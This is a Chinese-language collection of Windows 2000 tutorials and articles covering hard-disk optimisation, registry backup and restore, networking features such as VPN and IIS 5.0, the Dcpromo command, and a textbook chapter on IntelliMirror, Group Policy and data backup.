    现在电脑爱好者们所用的硬盘要比过去大得多，动辄10G、20G、甚至更大。就本人所知：大硬盘一般都支持DMA工作模式，如果确定你的硬盘支持DMA方式，那么你就可以用DMA方式代替传统的PIO方式。这样可以提高硬盘的传输速度并减少CPU占用率，以提高系统性能。具体可按以下步骤操作：用鼠标右键单击“我的电脑”→“管理”→“设备管理器”→“IDE ATA/ATAPI控制器”→“Primary IDE Channel”→“属性”→“高级设置”，在传输模式中选择“DMA”即可。
    3.为硬盘减肥
    在你的Windows 2000操作系统运行过程中，常常会产生诸如＊.tmp、＊.bak、＊.log、＊.old、＊.txt的文件，这些文件其实都是可以安全删除的。如果你不喜欢Windows 2000自带的那些墙纸，还可以把WINNT目录下面的＊.bmp文件彻底删除掉。
    另外，在你的Windows 2000操作系统WINNT\temp目录下面的文件，也可以删除掉，那些都是在安装应用软件的过程中遗留下的多余文件。还有一点，就是尽可能地将硬盘中的小文件集中起来，然后用WINZIP这样的压缩软件合并成一个大文件，从而达到减少磁盘空间浪费的目的。
    4.用快速压缩减肥
    你可以通过压缩一些对装载速度要求不高的内容来节省磁盘空间。例如，一些不经常使用的文件或文件夹，或是你不经常使用的程序以及你不准备完全归档的数据等。在资源管理器中，右键单击文件或文件夹并选择“属性”，打开文件属性对话框，在“常规”选项卡中单击“高级”按钮，在打开的“高级属性”对话框中选中“压缩内容以便节省磁盘空间”复选框。
    5.设置硬盘的写入缓存
    Windows2000可以为硬盘提供写入缓存（Cache），加快硬盘的访问速度。打开写入缓存的设置方法是：右键点击桌面上“我的电脑”图标，选择“属性”，接着在弹出窗口中选择“硬件”页签的“设备管理器”，选择“查看”菜单里的“依类型排序设备”，然后展开“Disk Drivers”找到你需要设置的硬盘，然后双击进入其属性设置界面，在“磁盘属性”页签中将“启用了写入缓存”选项选中。按照此方法设置系统中的所有硬盘，确定后重启系统使之生效。这个设置虽然简单，但效果却比较明显，可以有效地增强磁盘和系统性能。
    6.修复硬盘错误
    利用Windows2000的错误检查工具，可以查找到硬盘上的文件系统错误和坏扇区。方法是：打开“我的电脑”，选择需要检查的本地磁盘。在“文件”菜单上单击“属性”，然后单击“工具”选项卡。单击“错误检查”下的“开始检查”，并选定“磁盘检查选项”下的“扫描并尝试恢复坏扇区”复选框即可。


Windows2000注册表的备份与恢复

《一键清理系统垃圾》

Windows2000注册表的备份与恢复

    Windows 2000 将它的配置信息存储在名为注册表的数据库中，其中包含了每个计算机用户的配置文件，以及有关系统硬件、已安装的程序和属性设置等信息，Windows 2000 在运行过程中要一直引用这些信息。注册表是以二进制形式存储在硬盘上，错误地编辑注册表可能会严重损坏系统。所以，在更改注册表之前，强烈建议备份注册表信息。为了防止在修改注册表的时候发生致命错误，有必要了解一下注册表文件的备份和恢复方法。除此之外，为了研究注册表的结构，还可以将注册表中的某一主键或子键保存为文本文件，或者打印出来，这项工作同样需要了解注册表文件的导入与导出方法。

    一、完全备份／恢复注册表
    如果要完全备份注册表，可以在注册表编辑器Regedit.exe中单击“注册表”菜单下的“导出注册表文件”命令，并选择导出范围为“全部”，将注册表文件（＊.reg）保存在硬盘上即可。要完全还原注册表的方法同上，只需要单击“注册表”菜单下的“导入注册表文件”命令，然后选择硬盘上相应的备份注册表文件即可。顺便提一下，Regedit.exe（16位的注册表编辑器）包含在 Windows 2000 中的主要原因是其搜索功能比较强，用户同样可以使用 Regedit.exe 更改注册表，但其功能不够全面（如无法设置注册表项的权限），可能无法正确查看或编辑个别数据类型。因此，建议只将 Regedit.exe 用于搜索及注册表的完全备份，在需要编辑注册表时，使用system32目录下的 Regedt32.exe（它是32位注册表编辑器，提供了一些高级功能，采用多窗口格式显示各预定义项，查看起来比较方便）。

    二、部分备份注册表
    如果只需要保存一个根键或者一个主键（子键）等一般的备份，在Regedt32中就可以比较方便地完成。首先选择要保存的主键或子键，然后再单击“注册表”菜单下“保存项”命令，在弹出的“保存项”对话框中输入要保存的注册表文件的文件名，扩展名建议使用“reg”，便于今后查找。

    在保存某些主键或子键时，因为其使用的用户不同，或者是该主键或子键正在被系统使用，会出现禁止访问的警告：“权限不足，无法保存项”。这时系统管理员可以使用“安全”菜单下的“权限”命令，对这些主键或子键的用户赋予“完全控制”的权限（具体操作参见第15期《电脑报》软件世界中“Windows 2000 注册表直通车（上）”一文），然后就可以保存该项了。

    将注册表主键或子键保存为“项”文件，无法直接用文本编辑器打开查看，所以想研究注册表的结构的话，可以将注册表文件导出为文本文件，操作的方法是选择“注册表”菜单下“将子目录树另存为”命令，将其命名为扩展名为TXT的文件后，再单击“保存”按钮即可。以后我们就可以使用Windows的写字板或记事本来查看这个文本文件了。如果需要，也可以使用同一菜单下的“打印子目录树”命令来打印。

    三、部分恢复／导入注册表
    部分恢复／导入注册表有两种方法，第一种是还原“项”，即使用以前备份的注册表文件或其它注册表文件来覆盖现有的主键。首先在Regedt32注册表编辑器中，将光标移至要还原的主键上，再选择“注册表”菜单下的“还原”命令，并在“还原项”窗口中选择要还原的注册表文件，单击“打开”按钮，确认覆盖现有主键后，即可还原该项到当前选定的项上。注意：被选择还原的文件必须与注册表编辑器中所选择的主键内容吻合，即原先保存的注册表“项”只能还原到原先的位置。 　　另外一种方法是加载配置单元。“加载配置单元”和“卸载配置单元”。这两个命令只有在[HKEY_USERS]或[HKEY_LOCAL_MACHINE]这两个预定义项窗口中才有效，将配置单元加载到注册表中后，配置单元成为其中一个项的子项。具体做法是在Regedt32注册表编辑器中，先用鼠标选择上述两个预定义项中的一个主键，再选择“注册表”菜单下的“加载配置单元”命令，接着在“加载配置单元”对话框内选择要加载的注册表文件，单击“打开”按钮后出现“加载配置单元”对话框，在对话框的“项名称”文本框内输入新主键的名称，如“.ChenNai”，再单击“确定”按钮，这样你就发现在当前主键的下面出现了一个新的主键（.ChenNai）。如果要卸载该配置单元，也很简单，选中该主键后，选择“注册表”菜单下“卸载配置单元”命令即可。

    上述两种方法的不同之处在于“加载配置单元”引入的主键可以是注册表内原先没有的内容。

    最后说一下，Windows 2000中注册表文件的位置，同Windows 9X一样，Windows 2000的注册表也分为两个部分，但包括多个文件，其中用户配置文件保存在根目录“Documents and Settings”下用户名的目录中，包括两个隐藏文件：NTUSER.DAT、NTUSER.INI及ntuser.dat.LOG日志文件。系统配置文件位于Windows 2000系统目录下的“SYSTEM32\CONFIG”中，包括DEFAULT、SOFTWARE、SYSTEM、AppEvent.Evt、SecEvent.Evt、SysEvent.Evt等多个隐藏文件及其相应的.LOG（日志）文件和.SAV文件。这些注册表文件在Windows 2000运行时无法使用其它工具打开，这一点与Windows 9X下的system.dat及user.dat不同。

返回


Windows2000――最佳的网络运用平台

《一键清理系统垃圾》

Windows2000――最佳的网络运用平台

    在千喜年即将到来的今天，网络运用已变得十分普及，据统计，全球有1.48亿人在进行着Internet的冲浪，并有数不清的大中小型企业在应用网络进行管理与服务，难以计数的科研、教育与军事部门在运用网络办公与传递各类信息，就连日常生活中人们谈论网络的话题也变得十分流行。这就是信息或数字时代来临的一个特征。正是在世纪之交的重要时刻，几经酝酿的Windows2000诞生了。它融合了众多网络平台的优点，并发展了微软原先开发网络平台的诸多先进技术，运用起来不仅功能强大，而且便捷实用。下面就从几个侧面谈谈我在应用Windows2000支持网络服务方面的感受。

Internet冲浪更加自如
如今进行Internet的网上冲浪已成了一种时髦，人们或出于寻找有用信息、查询科研资料，或为了宣传产品、传递商业信息，或想联系客户、结交朋友等，都常常倾心于国际互联网。我虽不是一个"网虫"，但也因研究工作需要时常忙碌于网上。因此，使我对用于网际浏览的工具特别在意。由于Windows2000中集成了新的IE5（Internet Explorer5）浏览器，使我在Internet上冲起浪来倍感自如。

IE5可以算是众多Internet测览器中效能较好的之一，它采用了 IntelliSense技术，能帮助用户、管理员和应用程序开发员完成最经常的日常事务，并具有脱机测览功能，是一个使用方便、速度快捷、功能强大的浏览工具。IE5与Windows2000 Professional集合在一起，不需要单独安装。

通过对IntelliSense技术的运用，IE5能自动完成最频繁的 Web访问任务。我在查询那些长字符串网站时，常利用其"记忆式键入"功能，只输入所查网站的前几个字母，即可以顺利完成 URL地址的全称。为了省事，我还常通过"智能表单"来记忆一些重要的 Web表单数据。

另外，我所使用的记本电脑同时装有内置Modem和网卡，过去使用的平台是集成了IE4的Windows98，我常为上完互联网后又要连接办公室的局域网须来回手动变更配置而烦恼。而改装Windows2000后，我为所需进行连接的每个网络都配置了相应的代理服务器，尔后，当我启动某个网络连接时，由于IE5具有的智能化网络设置和检测技术，使Internet Explorer不再请求手动更新，便自动使用该连接对应的代理服务器设置，从而使我方便地实现了在局域网连接转与拨号连接间的转换。

当然，与以往的浏览器相比，新的浏览器中搜索助手能够使用多个搜索引擎对网络内容进行搜索，更有利于提高效率。并且，其多语言支持性能也迎合了当今国际社会多元化的需要，省却了很多来自其语言平台有用信息需另安装专用语言支持系统的麻烦。

轻易实现个人PC与专用网络"无缝连接"
我们现在所处的是一个竞争激烈的社会，不论是IT人士或是其它依靠网络办公的成员，有时仅靠8小时以内的常规工作时间很难完成自己手里的业务，往往不得不把没干完的活拿到家里来干；或者利用在家闲暇的时间完成部分工作，然后再到办公室去接轨。我作为这类人员中的一分子，以往最大的苦恼就是找不到一个能适应家庭环境与办公环境的通用网络平台。于是只好在下班时只简单地备分一些重要数据，回家后还要重起炉灶多做一些重复性的工作。但自从应用了Windows2000起，这种做一些无用功的苦恼便迎刃而解了。原因就在于，Windows2000中所具有的VPN（Virtual Private Network）技术，帮助我实现了个人PC机与办公室专用网络服务器之间的自然连接。

VPN 即"虚拟专用网络"技术，是Windows2000中刻意集成的一项网络应用技术，其通过内置可靠的路由服务，能够以广域网(WAN)和 Internet为通道向使用者提供局域网间路由服务。应用VPN，能够有效地模拟办公室或公司内部的专用网络环境，使移动用户外出时或员工回家时仍能继续工作。

由于在Windows 2000中，不论何种连接都可以在"我的网络位置"的属性中，通过"创建新的网络连接"来建立。因此，它既可以建立到办公区或公司内部网络的连接，也可以建立到Internet／虚拟专用网的连接，还可以建立接受直接线缆连接的网络。如果你要图省事，甚至可以采取设?quot;连接管理器"的方式。即把拨号所需的单位电话或者ISP电话号码自动地分配到用户的桌面上，这样无论你身处何处，Windows 2000都会自动地选用最佳的电话号码来进行拨号。

另外，如果没有网络设备，还可通过软件来实现虚拟网络服务。我单位办公室的服务器可以登陆国际互联网，我即在上面启用了PPTP／L2TP（第二层遂道操作）协议。然后在自己的笔记本电脑上先通过普通的PPP服务登陆Internet，然后通过虚拟的PPTP调制解调器再拔-个号，该号即为服务器的IP地址或者机器名。当通过登录验证窗口后，我便就在Internet上建立了一个虚拟的隧道。当我在家中使用笔记本电脑时，仍可顺利与办公定的服务器联通，就类似在局域网中进行工作的情景。

当然，我也常把笔记本电脑中的大容量工作内容复制到台式机中。过去往往采用外接硬盘等方法，自从安装了Windows2000后，我便通过选择支持红外线的虚拟端口形式，顺利地实现了将笔记本电脑中内容复制到台式机中，并保证正常浏览的目的。

自由建立Web网站
运用网络的人士，在遨游过众多网站之后，都免不了会萌发建立自己的Web网站的想法，并借此体现自己的主张，或开设个性化的网上园地，或进行企业性商业宣传、营销等等。而Windows 2000内置的强大Web服务功能，正好为实现这样的愿望提供了可能。

凡用过微软WindowsNT Server4．0的人士大都领略过内置于其中的IIS（Internet Information Server 4．0 Web服务器。其以速度优于其它系统的Web服务器而著称。而在Windows 2000中，进一步更新了IIS版本，即Internet Information Server 5.0。它具有以下几个特点：

――比原版本提供了更加方便的安装，将随同安装Windows 2000 Server 时自动安装好，省却了老版本另行安装的麻烦。
――提供了很多的管理向导，如以"权限设置向导"来帮助设定和协调Web访问和NIFS文件的访问权限，"服务器证书向导"来给服务器安装电子证书等。
――具有对ASP增强的支持，如，无脚本ASP页面的快速处理、HTTP和HTTPS(安全通道访问方式)共享状态等。
――可在单个IP地址上运营多个网站等。

而且，新IIS 一个重要特性就是便于多用户在一个基于Web的环境中共享和发布信息。在"共享文件夹"向导的指示下，可方便地将一个共享文件夹设置成一个安全的Web地址。根据这一特性，我通过打开桌面上的"我的网络位置"，然后增加了一个新的网络位置，并将它设为http://myserver／share，从而实现了象平常访问普通文件夹那样的访问远程Web文件夹中的文件。
当然，新的IIS还支持分布式发布和版本控制标准（Distributed Authoring and Versioning），以及对新的一些安全机制（如Digest Authentication，Server-Gated Cryptography and Fortezza）等提供支持。
总之，Windows2000同时集成了最新最强的 Internet应用程序服务，并拥有覆盖众多操作系统的完整Internet服务，通过它可对各种变化做出快捷的反应，高效地部署解决方案。同时，新的通信和网络服务会使部署 VPN更方便，并可将现有投资带入web，还可获得更高的可靠性、稳定性和扩展性。
俗话说，一块好玉需要好的雕琢与懂行的鉴赏家，Windows2000无疑就是一块好玉，但其价值需要我们这些使用者去发掘。

返回


Windows 2000 Advanced Server中的Dcpromo命令

《一键清理系统垃圾》

Windows 2000 Advanced Server中的Dcpromo命令

    被称为新世纪操作系统的Windows 2000系列即将正式发行。在综合了Winows 9x和Windows NT 4.0的各项优点之后，Windows 2000系列将以一种全新的面貌呈现在我们面前，集易用性、稳定性、可靠性、网络性和更好的兼容性于一身。

    而被广大企业级用户所关心的Windows 2000 Advanced Server更是在Windows NT Server 4.0的基础上增加了很多新的功能，我们这里主要讲讲其中的DCPromo命令。

    熟悉Windows NT 4.0的朋友们都知道，在安装一个Server之前，必须规划好这个Server的角色，是作为PDC（主域控制器），BDC（备份域控制器）还是Member or Stand-alone Server（成员或独立服务器）。而且需要提前规划好网络的逻辑结构，是组成Domain（域）还是组成Workgroup（工作组）。如果是组成Workgroup，那麽其中的Server只能作为Member Server来安装；如果是组成Domain，那麽Domain中安装的第一台Server必须是PDC，以后的Server可以安装成BDC，也可以安装成Member Server，但要注意的是安装BDC之前，域中必须已经存在有PDC，而且，一个域中有且只能有一个PDC。

    尽管当Domain中的PDC发生问题时，可以将一台BDC提升（Promote）为PDC，但DC(域控制器，包括PDC和BDC)和Member Server之间却不能相互转换，也就是说当安装了一个Server之后，如果想改变它的功能，重新确定它的角色，从DC变为Member Server，或是从Member Server变为DC，那麽唯一的办法就只能是重新安装Windows NT。因此NT 4.0中这种对于计算机角色的划分和管理模式就给域的规划提出了更高的要求，也给域的维护也带来了很大的麻烦。

    我们很高兴地看到，Windows 2000已经很好的解决了这个问题。在Windows 2000 Advanced Server中，计算机不再区分是PDC还是BDC，所有的Server只有DC和Member Server的差别，两者之间还可以非常方便地互相转换角色。而完成这一功能的工具便是Dcpromo.exe命令，它是Windows 2000 Advanced Server中内置的一个命令。

    当管理员希望改变一个Server的角色时，只需在命令行状态运行Dcpromo命令，Windows 2000便会自动判别当前计算机的角色，然后弹出一个Wizard（向导）窗口，引导用户一步一步地完成DC与Member Server之间的转换。用户还可以通过查看Dcpromo.log日志来确认转换是否成功。

    综上所述，我们可以看到虽然Dcpromo只是一条小小的命令，但它大大提高了Windows 2000的可管理性和易用性。其实这只是Windows 2000对比于以前版本的操作系统众多优越性中微不足道的一点改进，但从中我们也能的的确确地感受到Windows 2000本着尽量为用户着想的开发原则所做的努力。

返回


Windows 2000 Server 的高级管理

《一键清理系统垃圾》

Windows 2000 Server 的高级管理

本章主要内容：
1、利用智能镜像技术管理用户和计算机
2、数据备份和设备容错
3、设备容错
4、Windows 2000 虚拟专用网络

    13.1 利用智能镜像技术管理用户和计算机
    13.1.1 智能镜像的概述
    智能镜像（IntelliMirror） 将集中计算的优点和分布式计算的性能及灵活性结合起来。通过在服务器和客户端同时使用 IntelliMirror，用户的数据、应用程序和设置在所有的环境中都跟随用户。管理员也可以使用这些功能来执行 Windows 2000 操作系统的远程安装。
    Windows 2000 IntelliMirror 功能：
§　用户数据管理：支持将用户数据镜像到网络和所选网络数据的本地副本中。
通过将数据从计算机镜像到网络来保护重要的工作，除了有受到完全保护的数据之外，用户还可以使用网络上的任意 Windows 2000 计算机，而且总可以访问自己的数据。

IntelliMirror 用户数据管理功能使用以下技术：
  §　Active Directory
  §　组策略
  §　脱机文件
  §　同步管理器
  §　磁盘配额
  §　漫游用户配置文件
§　软件安装和维护：允许管理员集中管理软件的安装、修复、更新和删除。
    管理员可以使用 IntelliMirror 的软件安装和维护功能来安装和维护计算机上的应用程序。如果有任意应用程序需要更新，网络管理员都可以从服务器上对其进行更新。
§　用户设置管理：允许管理员集中定义用户和计算机的计算环境设置。还包括将用户设置镜像到网络中。

IntelliMirror 用户设置管理功能规定用户首选项和设置--与用户文档管理及软件安装和维护相同的基本功能。无论用户登录到网络上的哪台计算机，用户的首选项和设置仍然有效。这也允许管理员代表单位定义设置，并强制执行这些设置。
    IntelliMirror 用户设置管理功能使用以下技术：
  §　Active Directory
  §　组策略
  §　脱机文件
  §　漫游用户配置文件

§　远程安装服务：支持更简便的安装和配置，并允许将操作系统远程安装到整个企业的所有计算机上。

    13.1.2 脱机文件
    使用脱机文件，即使没有连接到网络也可以继续处理网络文件和程序。
    如果断开与网络的连接或移除便携式计算机，指定为可以脱机使用的共享网络条目与连接到网络时完全相同。可以象通常一样继续处理。对这些文件和文件夹的访问权限与连接到网络时相同。当连接状态变化时，"脱机文件"图标将出现在状态区中，状态区上会显示提示信息，通知用户这一变化。当网络连接恢复或插接便携式计算机时，所有脱机时所作的更改均将更新到网络上。用户和网络上的其他人对同一文件作出更改时，用户可以选择将用户的文件版本保存到网络、保留其他版本或两个版本均保存。
    用户可以手动启动同步，也可以将"同步管理器"设置为在脱机文件与网络同步时控制同步。"同步管理器"还控制执行完全同步还是快速同步。完全同步可以确保获得每个指定为允许脱机使用的网络文件的最新版本。快速同步比完全同步速度快得多，但是可能不提供每个指定为可以脱机使用的网络文件的最新版本。
    Microsoft 网络上的任何共享文件或文件夹均可以指定为允许脱机使用。用户可以允许脱机使用来自任何支持基于"服务器消息块"(SMB) 文件和打印机共享的计算机（包括 Windows 95、Windows 98 和 Windows NT 4.0）上的文件。但在 Novell NetWare 网络上不能使用"脱机文件"。
    系统管理员可以设置共享文件夹，使在该共享文件夹中打开的每个网络文件均自动指定为可以脱机使用，或仅指定允许脱机使用所选的网络文件。
    如果文件的快捷方式被允许脱机使用，该文件即可脱机使用，但是如果文件夹的快捷方式被允许脱机使用，该文件夹的内容将无法脱机使用。

    13.1.2.1 脱机工作原理
    "脱机文件"通知用户网络连接的状态是否变化。当网络连接的状态变化时，"脱机文件"图标将出现在状态区，状态区上会显示信息提示，通知用户这一变化。如果信息提示通知用户处于脱机状态，用户可以继续象通常一样使用文件，也可以单击状态区中的"脱机文件"图标，获得有关连接状态的详细信息。
    即使脱机工作断开网络或便携式计算机出坞，仍可以在"我的电脑"或"网上邻居"中浏览网络驱动器或共享文件夹。断开的网络驱动器上将出现红叉。网络连接断开后，用户将只能看到可以脱机使用的文件和创建的文件。
无论是连接到网络还是脱机工作，对网络文件和文件夹的权限均保持不变。例如，如果用户断开网络，映射网络驱动器上的只读文档仍保持只读。
    断开网络后，可以打印到本地打印机，但无法打印到网络上的共享打印机。取而代之，该文件被后台处理，并在重新连接网络时打印到网络打印机。
    重新连接网络后，"同步管理器"将使用脱机工作时所作的更改来更新网络文件。

13.1.2.2 设置计算机以便使用"脱机文件"
    步骤1 打开"我的电脑"
    步骤2 在"工具"菜单上，单击"文件夹选项"。
    步骤3 在"脱机文件"选项卡上，确保选中了"启用脱机文件"复选框，如图 13.1。
    步骤4 选中"注销前同步所有脱机文件"以便进行完全同步。清除该选项则进行快速同步。

13.1.2.3 使文件或文件夹可以脱机使用
    步骤1 在"我的电脑"或"网上邻居"中，单击要指定为可以脱机使用的共享网络文件或文件夹。
    步骤2 在"文件"菜单上，单击"允许脱机使用"，如图13.2。

注意
§　只有将计算机设置为使用"脱机文件"，"允许脱机使用"才会出现在"文件"菜单上。有关将计算机设置为使用"脱机文件"的信息，请参阅相关主题。
§　第一次允许脱机使用条目时，"脱机文件"向导会引导用户完成该过程。"正在同步"对话框消失后，该条目即可脱机使用。
可允许脱机使用共享网络文件夹中的单个文件或整个共享网络文件夹。如果允许脱机使用整个文件夹，该共享文件夹中的所有文件在下一次计算机同步时，将自动可以脱机使用。
§　如果文件的快捷方式被允许脱机使用，该文件即可脱机使用，但是如果文件夹的快捷方式被允许脱机使用，该文件夹的内容将无法脱机使用。
§　当网络连接的状态变化时，"脱机文件"图标将出现在状态区，状态区上会显示提示信息，通知用户这一变化。如果提示信息通知用户处于脱机状态，用户可以继续象通常一样使用文件，也可以单击状态区中的"脱机文件"图标，获得有关连接状态的详细信息。
§　要取消文件或文件夹的脱机使用许可，请右键单击该条目并再次单击"允许脱机使用"，清除复选标记。

13.1.2.4 更改"脱机文件"对网络断开的响应方式
    步骤1 打开 "我的电脑"。
    步骤2 在"工具"菜单上，单击"文件夹选项"。
    步骤3 在"脱机文件"选项卡上，单击"高级"。
    步骤4 在"网络连接丢失时"下，执行下列操作之一：
§　单击"通知我，然后开始脱机工作"，接收已断开连接的通知并继续使用脱机文件和文件夹。
§　单击"不允许计算机脱机工作"，使用户断开网络连接时无法使用脱机文件和文件夹。 如图13.3

13.1.3 软件安装和维护
    软件安装帮助管理员在企业中在服务器上完成客户机中应用程序安装和维护。
§　如果用组策略以指派的方式安装应用程序，将在用户登录的客户机的"开始"菜单中创建一个应用程序的快捷方式，并在注册表中创建相应的文件关联，当用户使用该程序的时候它才被完整安装。这与以前的安装方式有了很大的区别，应用程序采用了Windows安装服务，应用程序的安装过程由Windows 2000 系统管理和执行，提高了应用程序的可操作性和可管理性。
§　如果用组策略发布应用程序，发布的应用程序将出现在客户机的"控制面板"中的"添加/删除程序"项中，发布的应用程序是否安装由用户自己决定。当用户或应用程序需要打开某个文件时，在注册表中该文件与要安装的应用程序关联，这时才显示安装界面，用户称之为"文档激活"，同时发布的应用程序还支持传统的程序安装方法。
§　对客户机上应用程序的修复是由Windows 安装服务来完成的每当激活一个由授权的Windows 服务管理的应用程序时，Windows服务将定时检查应用程序的有效性，在程序损坏时自动完成丢失文件或错误设置的修复工作。
用户可以利用两种方式管理应用程序的安装：指派（Assign）和发布（Published）

13.1.3.1 指派
    指派：当希望所选组策略对象中的每个用户均可以在计算机上安装该应用程序，可采用指派应用程序
    步骤1 从"Active Directory 用户和计算机"、"Active Directory 站点和服务"或作为独立的 Microsoft 管理控制台管理单元打开组策略。
    步骤2 要对计算机分配软件，请双击"计算机配置"。要对用户分配或发布软件，请双击"用户配置"。
    步骤3 双击"软件设置"。
    步骤4 在控制台树中，单击"软件安装"，然后单击"操作"菜单，选择"新建"，选择"程序包…" 如图 13.4

步骤5 选择 Windows 安装程序包，选择部署方式"已指派"如图 13.5。

完成程序包的添加 如图 13.6
    用户可以利用运行程序和文件激活的方式安装程序，但用户不能删除指派的应用程序，如果用户删除了它，在用户下次登录到客户机时将被再次通知指派的应用程序
    发布：

13.1.3.2 发布程序
    如果希望用户决定是否安装应用程序则可以利用发布的方式，操作步骤同上，只是在选择部署类型的时候选择"已发布"。
    计算机或用户的"软件安装"属性的设置在安装程序属性中的"部署" 标签中常用选项如图13.7。
    当这个组策略对象不再适用于某个计算机或用户时，自动删除相应的应用程序。

在客户机的"控制面板"中的"添加/删除程序"项中显示该程序包，安装方式有两种：
    基本选项：安装程序的常用选项
    最大选项：安装程序的所以选项（默认设置）
    用户可以利Windows 2000 server 安装盘中附带的veritas software中的Winstall制作工具如图13.8，制作需要发布的程序包。
    通过以上介绍用户可以看到利用组策略中的软件安装功能提高了工作效率，减轻了工作负担，使得软件的安装、维护和管理更为灵活和简便。

13.1.4 组策略
    组策略设置定义了系统管理员需要管理的用户桌面环境的多种组件，例如，用户可用的程序、用户桌面上出现的程序以及"开始"菜单选项。使用组策略管理单元，可以为特定用户组创建特定的桌面配置。所指定的组策略设置包含在组策略对象中，而组策略对象又和所选择的站点、域或组织单位的 Active Directory 对象相关联。组策略包括影响用户的"用户配置"和影响计算机的"计算机配置"。利用组策略及其扩展，可以：
§　通过管理模板管理基于注册表的策略。组策略创建包含注册表设置的文件，这些注册表设置被写入到注册表数据库的"用户或本地计算机"部分。登录到给定的工作站或服务器用户特定的用户配置文件写在注册表的 HKEY_CURRENT_USER (HKCU) 下，而计算机特定设置写在 HKEY_LOCAL_MACHINE (HKLM) 下。
§　"指派脚本"（例如启动或关机，登录和注销）。
§　重定向文件夹从本地计算机上的"Documents and Settings"文件夹到网络位置。
§　管理应用程序（分配、发布、更新或者修复）。为此，用户可以使用软件安装扩展。
§　指定安全选项有关安全组选项的设置，请参阅安全设置联机帮助。

13.1.4.1 如何以及何时应用组策略
    用户及计算机策略：
    用户策略（位于组策略中"用户配置"节点下的设置），在用户登录时获得。计算机策略设置位于"计算机配置"下，在计算机启动时获得。"用户和计算机"是接收策略的唯一 Active Directory 对象类型。具体地说，安全组没有他们要应用的策略。由于性能方面的原因，安全组可以通过"应用组策略"的访问控制项 (ACE) 来筛选该策略，该访问控制项可以设置为"允许"或"拒绝"或保留为不配置。
    应用顺序：
    策略按如下顺序应用：
    唯一的本地组策略对象。
    站点组策略对象，按照行政管理指定的顺序。
    域组策略对象，按照行政管理指定的顺序。

对于组织单位组策略对象，按照从大组织单位到小的组织单位顺序（从父组织单位到子组织单位），而在每个组织单位级别中，则按照行政管理指定的顺序。
    默认情况下，这些策略不一致时，后应用的策略将覆盖以前应用的策略。但是，如果这些设置不一致，前后的策略都将作为有效策略。
    用安全组成员身份筛选策略：
    组策略对象的安全组 ACE 可以设置为"未配置"（没有优先级）、"允许"或"已拒绝"。"已拒绝"的优先级高于"允许"。
    阻止策略继承：
    从更高级站点、域或组织单位继承的策略可以在该站点、域或组织单位级别被拒绝。
    从更高级别执行策略：
    可以在组策略对象级别将某些策略设置为"禁止替代"，否则该策略将被子组织单位策略覆盖。

13.1.4.2 配置及管理组策略
    编辑组策略对象：
    步骤1 打开要编辑的组策略对象。
    步骤2 双击详细信息窗格中的项目更改其设置
    创建新的组策略对象：
    步骤1 打开 Active Directory 用户和计算机，创建链接到域或组织单位的组策略对象。
    或打开 Active Directory 站点和服务，创建链接到站点的组策略对象。
    步骤2 在控制台中，右键单击新建的组策略对象要链接到的站点、域或组织单位。（保存在当前域中。）
    步骤3 单击"属性"，然后单击"组策略"选项卡, 如图 13.9。
    步骤4 单击"新建"，键入组策略对象的名称，然后单击"关闭"。

    将组策略对象链接到站点、域或组织单位：
    步骤1 打开 Active Directory 用户和计算机，创建链接到域或组织单位的组策略对象。
    或打开 Active Directory 站点和服务，创建链接到站点的组策略对象。
    步骤2 在控制台中，右键单击组策略对象应该链接到的站点、域或组织单位。
    步骤3 单击"属性"，然后单击"组策略"选项卡。
    步骤4 要将组策略对象添加到"组策略对象链接"列表中，请单击"添加"。出现"添加组策略对象链接"对话框。
    步骤5 单击"全部"选项卡如图13.10，单击所需的组策略对象，然后再单击"确定"。
    步骤6 在站点、域或组织单位的"属性"对话框中，单击"确定"。

    13.2 数据备份
    13.2.1 数据备份
    如果系统遭受硬件或存储媒体故障，则"备份"工具可以帮助用户保护数据免受意外的损失。例如，可以使用"备份"在硬盘上创建数据的副本，然后在其他存储设备（例如硬盘或磁带）上存档该数据。如果硬盘上的原始数据被意外删除或覆盖，或因为硬盘故障而不能访问该数据，那么用户可以十分方便的从存档副本中还原该数据。
    使用"备份"，可以：
§　在硬盘上存档选择的文件和文件夹。
§　将存档文件和文件夹还原到硬盘或其他任何可以访问的磁盘上。
§　创建紧急修复磁盘 (ERD)，如果系统文件损坏或意外被擦除，该磁盘可以帮助用户修复它们。
§　备份任何远程存储数据和存储在已装入驱动器的任何数据。
§　备份系统状态，它包含注册表、Active Directory 数据库，和"证书服务"数据库。
§计划常定期份以保持存档数据是最新的。
    可以使用"备份"来备份和还原文件分区表 (FAT) 或 NTFS 文件系统卷上的数据。然而，如果从 Windows 2000 中使用的 NTFS 卷上备份了数据，则推荐用户也将该数据还原到 Windows 2000 中使用的 NTFS 卷中去，否则，用户可能会丢失一些数据以及文件和文件夹特性，例如权限、加密文件系统 (EFS) 设置、磁盘配额信息、已安装驱动器信息和"远程存储"信息。

    "备份"实用程序支持五种方法备份计算机或网络上的数据，它们是：
§　副本备份
    副本备份复制所有选中的文件，但不将这些文件标记为已经备份。如果用户想在正常和增量备份之间备份文件，复制是很有用的，因为复制不影响其他备份操作。
§　每日备份
    每日备份复制执行每日备份的当天中修改的所有选中的文件。已备份文件在备份后不做标记（换言之，不清除存档属性）。
§　差异备份
    从上次正常或增量备份后，创建或修改的差异备份副本文件。备份后不标记为已备份文件（换言之，不清除存档属性）。如果执行了正常和差异备份的组合，还原文件和文件夹要求用户执行了上一次正常和差异备份。
§　增量备份
    增量备份只备份上一次正常或增量备份后，创建或改变的文件。备份后标记文件（换言之，清除存档属性）。如果使用正常和增量备份的组合，用户需要具有上一次普通备份集和所有增量备份集，以便还原数据。
§　普通备份
    普通备份复制所有选中文件，并且备份后标记每个文件（换言之，清除存档属性）。使用普通备份，用户只需要最近备份的文件或磁带的副本来还原所有文件。第一次创建备份集时，通常执行普通备份。

    13.2.2 备份文件和文件夹
    "备份"使用户可以将数据备份到文件或磁带。将数据备份到文件时，必须指定文件要保存的名称和位置。备份文件的扩展名通常为 .bkf，但是用户可以将该扩展名更改为用户喜欢的扩展名。备份文件可以保存到硬盘、软盘或任何其他可以保存文件的可移动或不可移动媒体。
    将数据备份到磁带时，计算机必须接有磁带设备。同样，磁带也由可移动存储管理。尽管"备份"与"可移动存储"一同工作，但可能须使用"可移动存储"来执行某些维护任务，例如准备和弹出磁带。
    下列四个步骤描述了一个简单的备份操作：
    步骤1 选择要备份的文件、文件夹和驱动器
    "备份"为用户提供了计算机中驱动器、文件和文件夹的目录树视图，可以使用该视图来选择要备份的文件和文件夹。用户可以象使用 Windows 资源管理器一样使用此目录树视图来打开驱动器和文件夹并选择文件。
    步骤2 为备份数据选择存储媒体或文件位置
